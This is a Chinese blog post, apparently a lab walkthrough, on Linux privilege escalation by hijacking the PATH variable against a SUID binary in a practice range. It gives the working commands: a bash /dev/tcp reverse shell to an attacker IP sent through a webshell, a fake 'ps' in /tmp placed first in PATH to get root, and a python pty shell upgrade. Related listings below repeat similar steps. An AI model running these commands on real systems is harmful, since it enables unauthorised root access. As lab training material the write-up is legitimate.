环境变量提权

最新推荐文章于 2024-09-06 18:06:22 发布
最新推荐文章于 2024-09-06 18:06:22 发布
阅读量412 收藏 8
点赞数 9
分类专栏: linux 权限提升 文章标签: linux 权限提升
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longwanlian/article/details/134958068
版权
文章讲述了如何在LINUX系统中通过环境变量提权,利用一个具有可执行权限但受限的文件,将其目录添加到PATH环境变量中,从而在特定目录外执行。通过红日7靶场复现并利用python的pty模块实现反弹shell获取root权限。
摘要由CSDN通过智能技术生成

环境变量提权

借鉴文章LINUX提权之环境变量提权篇 - 知乎 (zhihu.com)

利用条件

存在一个文件,利用su权限执行,普通用户可以执行此文件,但只限制在一个目录下可以执行

利用方式

将此文件的目录添加到环境变量中

export PATH=/tmp:$PATH

echo $PATH 命令可以查看环境变量

漏洞复现

这里借用红日7靶场进行复现

这里已经进入一台linux主机

find / -perm -u=s -type f 2>/dev/null

从根目录查找具有root权限的二进制执行文件

image-20231205182628029

没有找到可以进行suid提权的命令

但是发现了/home/jobs/shell

瞅一眼

image-20231205182913335

运行后创建了一个shell进程 (cmd表示执行的命令根据sh可知)

基于此推测使用环境变量提权的方式进行

考虑采用kali终端会更方便,用蚁剑命令执行反弹shell到kali中(这里需要使用蚁剑的代码执行插件)

image-20231205185032272

system('bash -c "bash -i >& /dev/tcp/192.168.52.128/3333 0>&1" ');

可能第一次无法反弹上去,需要多几次

然后在kali依次输入一下命令

cd /tmp #进入临时目录
echo "/bin/bash" > ps #写入bash命令放入ps文件
chmod 777 ps #给此文件赋予权限
echo $PATH  #查看环境变量
export PATH=/tmp:$PATH # 将/tmp添加到环境变量中,并且先加载执行/tmp里的程序
cd /home/jobs
./shell 
# 然后就获得了root权限,可以执行命令了

image-20231205185556734

使用

python -c 'import pty;pty.spawn("/bin/bash");'

进入交互式终端

python -c 'import pty;pty.spawn("/bin/bash");'

进入交互式终端

image-20231205185915045

longersking
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
操作系统权限提升(五)之系统错误配置-PATH环境变量提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-01 952
PATH环境变量包含很多目录列表,某些执行程序的方法(即使用cmd.exe或命令 行)仅依赖PATH环境变量来确定未提供程序路径时搜索程序的位置。
权限提升-linux提权手法总结
01-14
- **环境变量**:通过`env`或`cat /etc/profile`等命令来查看是否存在泄露敏感信息的情况。 - **运行的服务**:使用`ps aux`、`top`等命令来查看当前有哪些服务正在运行及其所属用户。 - **用户配置文件**:检查用户...
权限提升-Linux提权-环境变量文件配合SUID提权
xiaoheizi的博客
09-04 274
命令:cp /bin/bash /home/ps #将/bin/bash复制为 /home/ps 相当于现在的/home/ps是bash命令。export PATH=/home:$PATH #环境变量加入/home 执行ps相当于执行/home/ps。./shell #shell执行,system权限执行ps命令,相当于suid执行bash就是直接提权。#system权限执行ps命令。2.编译demo文件重命名为shell(给到了suid权限),赋予执行权限 执行后运行ps命令。
Linux中使用环境变量进行提权
mingyqf的博客
10-24 1306
本文作者:secist,转载自FreeBuf.COM secist2018-06-20 13:00:306441867 在这篇文章中,我将会为大家介绍一些使用环境变量进行Linux提权的方法,包括在CTF challenges中使用到一些的技术。话不多说,让我们进入正题! 介绍 PATH是Linux和类Unix操作系统中的环境变量,它指定存储可执行程序的所有bin和sbin目录。当用户在终端上执行任何命令时,它会通过PATH变量来响应用户执行的命令,并向shell发送请求以搜索可执行文件。超级...
LINUX提权环境变量提权
Jinmindong
12-14 300
今天给大家带来了环境变量提权比较简单的方法不知道大家听明白了没有,环境变量提权中比较重要的就是结合suid权限来展开,本文只是简单列举了其中的几个方法,因为本人也很少用这种方法,可能理解的不是很到位望大佬们指点,如果喜欢本文不妨一键三连支持一下。
提权技术详解.pptx
09-03
提权技术详解】 提权技术,通常在网络安全领域中被提及,指的是攻击者通过获取系统中的较低权限,然后利用漏洞或策略缺陷提升自身权限,最终达到控制系统或获取敏感信息的目的。提权技术涵盖多种技术和策略,包括...
Linux利用UDF库实现Mysql提权
09-10
Linux环境中,MySQL数据库系统允许用户通过UDF(User Defined Function)机制来扩展其功能,这意味着我们可以创建自己...在生产环境中,务必遵循最小权限原则,并定期更新和审计数据库系统,防止未经授权的提权行为。
linux 普通用户提权到root.docx
06-04
Linux 系统中,普通用户可以通过多种方式提权到 root,例如,使用 su 命令、使用 setuid 函数、使用 LD_PRELOAD 环境变量等。下面我们将详细介绍如何使用这些方法实现普通用户的提权。 1. 使用 su 命令 su 命令...
red hat5提权
04-10
它可能包括了命令行指令、漏洞描述、环境变量设置等信息,对于理解提权过程至关重要。用户应该仔细阅读这份文档,结合视频教程和脚本,全面了解Red Hat 5的提权机制。 在实际操作中,提权通常分为本地提权和远程提...
环境变量_环境变量提权
weixin_35044481的博客
12-31 127
文章来源:LemonSec 有些应用程序使用了system等函数调用了系统命令,但是没有使用绝对路径而是使用env命令从环境变量中进行查找,这就可能通过修改环境变量来进行权限提升看下面的例子,本例来自于nebula://flag01.c#include #include #include #include #include int main(int argc, char ...
利用环境变量提权
weixin_34306593的博客
08-14 205
有时候我们在webshell下查看系统变量的时候总能得到一些惊喜,比如系统默认的是Path这个环境变量的值 是:%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;假如系统装过 php的话,那么它的环境变量可能是c:\php\;%SystemRoot%\system32;%SystemRoot%;%S...
Linux环境变量劫持提权
Longwaer
01-02 3169
环境变量劫持提权: 本文通过查找SUID文件,劫持环境变量,从而使账号成功提权至root;本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。 ** 个人理解: 首先环境变量劫持提权的条件,就是系统中存在带有suid的文件,且这个 文件中必须有系统命令; 这样我们就可以命名一个和这个系统命令相同的文件,写入/bin
在Ubuntu/Linux下重温FC游戏——超级玛丽奥
bluebird_shao的专栏
09-02 1491
FC 模拟器是指能够在某种机器上运行 FC 游戏的程序,FC 模拟器有好几种,Linux 平台下的 FCEUX 是一款功能强大的免费 FC/NES 模拟器,你可以使用它重温那些经典的游戏。
【运维监控】prometheus+node exporter+grafana 监控linux机器运行情况(2)
alanchanchn的专栏
09-03 1951
本示例是通过prometheus的node exporter收集主机的信息,然后在grafana的dashborad进行展示。本示例使用到的组件均是最新的,下文中会有具体版本说明,linux环境是centos。本示例分为四个部分,即prometheus、grafana、node exporter的部署和三者集成的监控linux。本文旨在说明三者如何使用,不涉及各自组件的介绍,如果需要使用到本文的,肯定都有了解。
Linux> 基础IO
最新发布
prodigy623的博客
09-06 494
详解Linux基础IO:文件系统调用接口与C库文件函数的关系、重定向、数据缓冲区、文件系统、动静态库
Linux】08.Linux 下的第一个小程序——进度条
caryon的博客
09-02 941
对换行与回车的直观解释,认识缓冲区,编写小程序
解决bug: RuntimeError: Address already in use,一个linux下pytorch多卡训练tcp端口占用的bug
beneficial的博客
09-03 327
时间:2024.9.3。
linux环境变量提权原理
08-13
- *1* *2* [linux利用环境变量提权](https://blog.csdn.net/m0_63917373/article/details/130486423)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值